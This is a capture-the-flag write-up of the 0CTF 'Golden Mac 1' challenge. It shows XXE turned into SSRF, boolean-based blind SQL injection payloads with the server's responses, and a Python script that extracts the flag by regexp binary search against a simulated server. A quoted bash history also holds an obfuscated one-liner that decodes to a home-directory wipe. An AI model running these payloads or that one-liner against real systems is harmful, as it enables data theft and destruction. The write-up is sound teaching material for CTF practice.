While playing Golden Mac 1 I found the .bash_history of user salt, which looked like:
whoami
pwd
ls
sudo nmap -sS 202.112.26.1/24 -p 22,80,3306
curl http://202.112.26.103/secret_blog/?id=1
msfconsole
curl https://twitter.com/_SaxX_/status/580376290525650944
python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"
shit!
exit
While the SaxX tweet was funny (its one-liner XOR-decodes with key 0x46 to import os; os.system("rm -rf ~/"), which explains the next history entry), the secret_blog looked promising. The IP was not reachable from the outside, but we could turn our XXE injection into an SSRF and visit the blog from the server's side. Using the XXE injection in the docx document, requesting http://202.112.26.103/secret_blog/?id=1 returns:
You do not have permission to access this post!
Other interesting results were:
http://202.112.26.103/secret_blog/?id=1
You do not have permission to access this post!
http://202.112.26.103/secret_blog/?id=0
Please specify an id :)
http://202.112.26.103/secret_blog/?id=2
You do not have permission to access this post!
http://202.112.26.103/secret_blog/?id=3
Post not exists!
Also:
http://202.112.26.103/secret_blog/?id=1 order by 1
You do not have permission to access this post!
Cool! The appended order by 1 was accepted without an error and the response stayed the same, so the id lands inside a SQL query and the result of that query is only reflected as one of those status messages: a blind SQL injection.
Further steps:
http://202.112.26.103/secret_blog/?id=1 or id=(select 1)
You do not have permission to access this post!
http://202.112.26.103/secret_blog/?id=1 or id=(select notexisting from nowhere)
500 Internal error
http://202.112.26.103/secret_blog/?id=1 or id=(select flag from flag)
You do not have permission to access this post!
YAY!! The subquery on a non-existent table raised a SQL error (the 500), while select flag from flag did not, so there is a table flag with a column flag.
At this point it was a matter of running a boolean-based blind SQL injection attack to extract the flag, using the two responses as a true/false oracle.
True statements:
http://202.112.26.103/secret_blog/?id=1 and true
You do not have permission to access this post!
False statements:
http://202.112.26.103/secret_blog/?id=1 and false
Post not exists!
We get the flag with a binary search over the next character of the flag, using regular expressions like the following, where %s is the prefix recovered so far followed by a character class holding the candidates for the next character (binary forces a case-sensitive, byte-wise match, since MySQL's REGEXP is otherwise case-insensitive):
http://202.112.26.103/secret_blog/?id=1 and ((select flag from flag) regexp binary '^%s' = 1)
FLAG: 0ctf{you_good_pentester_finally_find_me}
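The extraction loop sketched above, written out as an added example (this is not the writeup author's script). It assumes the flag is drawn from the alphabet 0-9, A-Z, a-z, { } and _, and it replaces the real target, which was only reachable through the XXE/SSRF hop, with a constructed stand-in that evaluates the injected regexp with Python's re module in place of MySQL's REGEXP BINARY and answers with the same two messages the blog returned. The extract_flag function is generic: against the live target the oracle would wrap the payload into the docx external entity URL and classify the text echoed back.

```python
import re
import string

# Alphabet the flag is assumed to come from (assumption: covers the writeup's flag).
# None of these characters is special inside a bracket expression, so the
# character classes built below need no escaping.
CHARSET = sorted(string.digits + string.ascii_letters + "{}_")

TRUE_MARKER = "You do not have permission to access this post!"  # a row came back
FALSE_MARKER = "Post not exists!"                                # no row came back


def classify_response(body):
    """Map the blog's reply to the boolean the injection leaks.

    Anything else (e.g. the 500 seen for a broken subquery) means the injected
    SQL was rejected, so fail loudly instead of treating it as False.
    """
    if TRUE_MARKER in body:
        return True
    if FALSE_MARKER in body:
        return False
    raise RuntimeError("unexpected response: %r" % body[:80])


def literal(prefix):
    """Escape the recovered prefix for use in the regexp: every non-word
    character (e.g. '{') is wrapped in its own bracket expression, which is
    portable across POSIX ERE, ICU and Python's re without any backslashes."""
    return "".join(c if (c.isalnum() or c == "_") else "[%s]" % c for c in prefix)


def build_payload(known, candidates):
    """The id parameter from the writeup with '^<prefix>[<candidates>]' as the pattern
    (shown unencoded; it must be URL-encoded before it goes into the entity URL)."""
    pattern = "^%s[%s]" % (literal(known), "".join(candidates))
    return "1 and ((select flag from flag) regexp binary '%s' = 1)" % pattern


def extract_flag(oracle, charset=CHARSET, max_len=64):
    """oracle(payload) -> bool. Recovers the flag one character at a time,
    binary-searching the alphabet with character classes. Returns the flag
    and the number of oracle queries spent."""
    known = ""
    queries = 0
    while len(known) < max_len:
        # Is there any next character at all? (Also stops if it is outside CHARSET.)
        queries += 1
        if not oracle(build_payload(known, charset)):
            break
        lo, hi = 0, len(charset)            # invariant: next char is in charset[lo:hi]
        while hi - lo > 1:
            mid = (lo + hi) // 2
            queries += 1
            if oracle(build_payload(known, charset[lo:mid])):
                hi = mid
            else:
                lo = mid
        known += charset[lo]
    return known, queries


# --- constructed stand-in for the target (not the real service) -------------
SIMULATED_FLAG = "0ctf{you_good_pentester_finally_find_me}"  # the flag from the writeup


def simulated_server(payload):
    """Mimics the vulnerable endpoint: pulls the regexp out of the injected
    clause and evaluates it with Python's re (case-sensitive, like REGEXP BINARY),
    replying with the same two messages the real blog produced."""
    m = re.search(r"regexp binary '([^']*)' = 1\)$", payload)
    if m is None:
        return "500 Internal error"
    matched = re.match(m.group(1), SIMULATED_FLAG) is not None
    return TRUE_MARKER if matched else FALSE_MARKER


def simulated_oracle(payload):
    return classify_response(simulated_server(payload))


if __name__ == "__main__":
    flag, n = extract_flag(simulated_oracle)
    print("FLAG: %s (%d queries)" % (flag, n))
```

Each character costs one "is there a next character" query plus about seven halving steps over the 65-symbol alphabet, so the whole flag comes back in a few hundred requests instead of the thousands a character-by-character guess would need. If the real flag used a character outside CHARSET (or one that is special inside a bracket expression, such as ']' or '-'), the loop would stop early at that position, so widen the alphabet, with proper escaping, if the result looks truncated.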